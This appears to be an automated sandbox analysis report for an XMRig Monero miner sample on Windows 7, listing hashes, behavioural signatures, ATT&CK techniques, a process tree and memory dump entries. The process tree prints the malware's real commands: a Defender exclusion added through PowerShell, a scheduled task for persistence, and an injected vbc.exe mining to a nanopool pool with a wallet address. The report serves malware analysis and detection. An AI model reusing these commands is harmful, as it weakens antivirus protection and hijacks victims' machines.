xmrig | cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

Analysis

max time kernel
137s
max time network
172s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 09:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.4MB
MD5

fb21c01c3d8d6b321034d48518c3d2a0
SHA1

372e822ce100a56d5066fce4574b9b0833daf27c
SHA256

cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b
SHA512

81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf
SSDEEP

24576:MiCj1Tnwpevq7BZlrkY/wP91wSRXZZAvnn3h:MR1Twpevq7HJkY4nwSRXIPn

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1492-142-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1492-144-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1492-146-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1492-147-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1492-157-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/1492-160-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1492-162-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

OWT.exe

pid process

968 OWT.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2032 cmd.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

OWT.exe

description pid process target process

PID 968 set thread context of 1492 968 OWT.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1648 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

556 timeout.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exeOWT.exe

pid process

944 powershell.exe
1144 powershell.exe
968 OWT.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
968	OWT.exe

pid	process
2032	cmd.exe

description	pid	process	target process
PID 968 set thread context of 1492	968	OWT.exe	vbc.exe

pid	process
1648	schtasks.exe

pid	process
556	timeout.exe

pid	process
944	powershell.exe
1144	powershell.exe
968	OWT.exe

pid	process
460

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	1160	file.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	968	OWT.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeLockMemoryPrivilege	1492	vbc.exe
Token: SeLockMemoryPrivilege	1492	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

1492 vbc.exe

pid	process
1492	vbc.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

file.execmd.exeOWT.execmd.exe

description	pid	process	target process
PID 1160 wrote to memory of 944	1160	file.exe	powershell.exe
PID 1160 wrote to memory of 944	1160	file.exe	powershell.exe
PID 1160 wrote to memory of 944	1160	file.exe	powershell.exe
PID 1160 wrote to memory of 2032	1160	file.exe	cmd.exe
PID 1160 wrote to memory of 2032	1160	file.exe	cmd.exe
PID 1160 wrote to memory of 2032	1160	file.exe	cmd.exe
PID 2032 wrote to memory of 556	2032	cmd.exe	timeout.exe
PID 2032 wrote to memory of 556	2032	cmd.exe	timeout.exe
PID 2032 wrote to memory of 556	2032	cmd.exe	timeout.exe
PID 2032 wrote to memory of 968	2032	cmd.exe	OWT.exe
PID 2032 wrote to memory of 968	2032	cmd.exe	OWT.exe
PID 2032 wrote to memory of 968	2032	cmd.exe	OWT.exe
PID 968 wrote to memory of 1144	968	OWT.exe	powershell.exe
PID 968 wrote to memory of 1144	968	OWT.exe	powershell.exe
PID 968 wrote to memory of 1144	968	OWT.exe	powershell.exe
PID 968 wrote to memory of 1192	968	OWT.exe	cmd.exe
PID 968 wrote to memory of 1192	968	OWT.exe	cmd.exe
PID 968 wrote to memory of 1192	968	OWT.exe	cmd.exe
PID 1192 wrote to memory of 1648	1192	cmd.exe	schtasks.exe
PID 1192 wrote to memory of 1648	1192	cmd.exe	schtasks.exe
PID 1192 wrote to memory of 1648	1192	cmd.exe	schtasks.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe
PID 968 wrote to memory of 1492	968	OWT.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp55CF.tmp.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:556

C:\ProgramData\winrar\OWT.exe
"C:\ProgramData\winrar\OWT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
5⤵
- Creates scheduled task(s)
PID:1648

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1492

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\winrar\OWT.exe
Filesize
1.4MB

MD5
fb21c01c3d8d6b321034d48518c3d2a0

SHA1
372e822ce100a56d5066fce4574b9b0833daf27c

SHA256
cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

SHA512
81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf

Download Submit
C:\ProgramData\winrar\OWT.exe
Filesize
1.4MB

MD5
fb21c01c3d8d6b321034d48518c3d2a0

SHA1
372e822ce100a56d5066fce4574b9b0833daf27c

SHA256
cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

SHA512
81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp55CF.tmp.bat
Filesize
138B

MD5
3efa6fa44be45fc6fd2c3353e36626d4

SHA1
ce1e19b5948f498eb771d7e71e8d0021a4d512fb

SHA256
958689b7e7f636ab1dca698bd66d3881a4a2cf194147eaf8695fd2ac27a74e79

SHA512
c646fbee881ffa6f35eee8562f5ab88f3cbdf1db59928911b80d69af3c990aae416406516b9e97264fc82ee10f66d5834462d4f716dfe0302725281cd9090cad

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
62b5cad45fa92998cbad984f27f00c0c

SHA1
1bd5a1ca455b536a5e2a575afbfd17ea02d14a08

SHA256
89b477bfa44d4179304d0763cf93775864923ff295618b23103563c0d50f8943

SHA512
17db5d8c3591cda38a3aae64619dc96e93161a8b3c49d56becd2bbecd5ca7cc864c07ca74f9fc2dc84e33cc10d266f7b105bd0f1245ae0612554571b37831d90

Download Submit
\ProgramData\winrar\OWT.exe
Filesize
1.4MB

MD5
fb21c01c3d8d6b321034d48518c3d2a0

SHA1
372e822ce100a56d5066fce4574b9b0833daf27c

SHA256
cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

SHA512
81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf

Download Submit
memory/556-81-0x0000000000000000-mapping.dmp

Download
memory/944-85-0x0000000002544000-0x0000000002547000-memory.dmp

Filesize
12KB

Download
memory/944-83-0x000000001B7D0000-0x000000001BACF000-memory.dmp

Filesize
3.0MB

Download
memory/944-84-0x0000000002544000-0x0000000002547000-memory.dmp

Filesize
12KB

Download
memory/944-82-0x000007FEF6190000-0x000007FEF6CED000-memory.dmp

Filesize
11.4MB

Download
memory/944-78-0x000007FEEDA90000-0x000007FEEE4B3000-memory.dmp

Filesize
10.1MB

Download
memory/944-73-0x0000000000000000-mapping.dmp

Download
memory/944-86-0x000000000254B000-0x000000000256A000-memory.dmp

Filesize
124KB

Download
memory/944-74-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

Filesize
8KB

Download
memory/968-126-0x000007FEF1A00000-0x000007FEF1A1C000-memory.dmp

Filesize
112KB

Download
memory/968-129-0x000007FEFACA0000-0x000007FEFAD04000-memory.dmp

Filesize
400KB

Download
memory/968-136-0x0000000000160000-0x00000000001A1000-memory.dmp

Filesize
260KB

Download
memory/968-135-0x00000000009A0000-0x0000000000B68000-memory.dmp

Filesize
1.8MB

Download
memory/968-134-0x000007FEFD0F0000-0x000007FEFD14B000-memory.dmp

Filesize
364KB

Download
memory/968-133-0x000007FEFDC90000-0x000007FEFDCC6000-memory.dmp

Filesize
216KB

Download
memory/968-132-0x000007FEFB3B0000-0x000007FEFB3D7000-memory.dmp

Filesize
156KB

Download
memory/968-131-0x000007FEFD8A0000-0x000007FEFD8C5000-memory.dmp

Filesize
148KB

Download
memory/968-130-0x000007FEFAD10000-0x000007FEFAD81000-memory.dmp

Filesize
452KB

Download
memory/968-128-0x000007FEFEE50000-0x000007FEFEE9D000-memory.dmp

Filesize
308KB

Download
memory/968-127-0x000007FEF1A20000-0x000007FEF1A82000-memory.dmp

Filesize
392KB

Download
memory/968-125-0x000007FEFD2D0000-0x000007FEFD2E7000-memory.dmp

Filesize
92KB

Download
memory/968-124-0x000007FEFD420000-0x000007FEFD442000-memory.dmp

Filesize
136KB

Download
memory/968-123-0x000007FEFEE00000-0x000007FEFEE1F000-memory.dmp

Filesize
124KB

Download
memory/968-122-0x000007FEFECA0000-0x000007FEFED77000-memory.dmp

Filesize
860KB

Download
memory/968-117-0x000007FEFC060000-0x000007FEFC275000-memory.dmp

Filesize
2.1MB

Download
memory/968-109-0x000007FEF7010000-0x000007FEF713C000-memory.dmp

Filesize
1.2MB

Download
memory/968-108-0x00000000009A0000-0x0000000000B68000-memory.dmp

Filesize
1.8MB

Download
memory/968-107-0x000007FEFC280000-0x000007FEFC2D6000-memory.dmp

Filesize
344KB

Download
memory/968-88-0x0000000000000000-mapping.dmp

Download
memory/968-106-0x000007FEFFCC0000-0x000007FEFFEC3000-memory.dmp

Filesize
2.0MB

Download
memory/968-105-0x000007FEFFA20000-0x000007FEFFB4D000-memory.dmp

Filesize
1.2MB

Download
memory/968-92-0x000007FEF7BB0000-0x000007FEF7C1F000-memory.dmp

Filesize
444KB

Download
memory/968-94-0x00000000009A0000-0x0000000000B68000-memory.dmp

Filesize
1.8MB

Download
memory/968-93-0x000007FEF7370000-0x000007FEF740C000-memory.dmp

Filesize
624KB

Download
memory/968-95-0x0000000000160000-0x00000000001A1000-memory.dmp

Filesize
260KB

Download
memory/968-97-0x0000000077A70000-0x0000000077B6A000-memory.dmp

Filesize
1000KB

Download
memory/968-96-0x000007FEFFC50000-0x000007FEFFCB7000-memory.dmp

Filesize
412KB

Download
memory/968-98-0x000007FEFDE70000-0x000007FEFDF0F000-memory.dmp

Filesize
636KB

Download
memory/968-99-0x0000000077B70000-0x0000000077C8F000-memory.dmp

Filesize
1.1MB

Download
memory/968-100-0x000007FEFDD70000-0x000007FEFDDDC000-memory.dmp

Filesize
432KB

Download
memory/968-101-0x000007FEFEF40000-0x000007FEFEFB1000-memory.dmp

Filesize
452KB

Download
memory/968-102-0x000007FEF7270000-0x000007FEF7367000-memory.dmp

Filesize
988KB

Download
memory/968-103-0x000007FEFF580000-0x000007FEFF65B000-memory.dmp

Filesize
876KB

Download
memory/968-104-0x000007FEF5910000-0x000007FEF62FC000-memory.dmp

Filesize
9.9MB

Download
memory/1144-110-0x0000000000000000-mapping.dmp

Download
memory/1144-121-0x000000000232B000-0x000000000234A000-memory.dmp

Filesize
124KB

Download
memory/1144-120-0x0000000002324000-0x0000000002327000-memory.dmp

Filesize
12KB

Download
memory/1144-116-0x000007FEECA80000-0x000007FEED5DD000-memory.dmp

Filesize
11.4MB

Download
memory/1160-70-0x000007FEFC280000-0x000007FEFC2D6000-memory.dmp

Filesize
344KB

Download
memory/1160-60-0x0000000077A70000-0x0000000077B6A000-memory.dmp

Filesize
1000KB

Download
memory/1160-57-0x000007FEF73A0000-0x000007FEF740F000-memory.dmp

Filesize
444KB

Download
memory/1160-79-0x0000000000620000-0x0000000000661000-memory.dmp

Filesize
260KB

Download
memory/1160-71-0x0000000001020000-0x00000000011E8000-memory.dmp

Filesize
1.8MB

Download
memory/1160-72-0x000007FEF6F10000-0x000007FEF703C000-memory.dmp

Filesize
1.2MB

Download
memory/1160-62-0x0000000077B70000-0x0000000077C8F000-memory.dmp

Filesize
1.1MB

Download
memory/1160-59-0x000007FEFFC50000-0x000007FEFFCB7000-memory.dmp

Filesize
412KB

Download
memory/1160-58-0x000007FEF7300000-0x000007FEF739C000-memory.dmp

Filesize
624KB

Download
memory/1160-63-0x000007FEFDD70000-0x000007FEFDDDC000-memory.dmp

Filesize
432KB

Download
memory/1160-64-0x000007FEFEF40000-0x000007FEFEFB1000-memory.dmp

Filesize
452KB

Download
memory/1160-65-0x000007FEF7040000-0x000007FEF7137000-memory.dmp

Filesize
988KB

Download
memory/1160-66-0x000007FEFF580000-0x000007FEFF65B000-memory.dmp

Filesize
876KB

Download
memory/1160-55-0x0000000001020000-0x00000000011E8000-memory.dmp

Filesize
1.8MB

Download
memory/1160-67-0x000007FEF6300000-0x000007FEF6CEC000-memory.dmp

Filesize
9.9MB

Download
memory/1160-77-0x0000000001020000-0x00000000011E8000-memory.dmp

Filesize
1.8MB

Download
memory/1160-56-0x0000000000620000-0x0000000000661000-memory.dmp

Filesize
260KB

Download
memory/1160-76-0x000007FEFEE00000-0x000007FEFEE1F000-memory.dmp

Filesize
124KB

Download
memory/1160-61-0x000007FEFDE70000-0x000007FEFDF0F000-memory.dmp

Filesize
636KB

Download
memory/1160-69-0x000007FEFFCC0000-0x000007FEFFEC3000-memory.dmp

Filesize
2.0MB

Download
memory/1160-68-0x000007FEFFA20000-0x000007FEFFB4D000-memory.dmp

Filesize
1.2MB

Download
memory/1192-115-0x0000000000000000-mapping.dmp

Download
memory/1492-140-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1492-160-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1492-144-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1492-138-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1492-164-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1492-142-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1492-137-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1492-146-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1492-147-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1492-157-0x0000000140343234-mapping.dmp

Download
memory/1492-163-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1492-162-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1648-119-0x0000000000000000-mapping.dmp

Download
memory/2032-75-0x0000000000000000-mapping.dmp

Download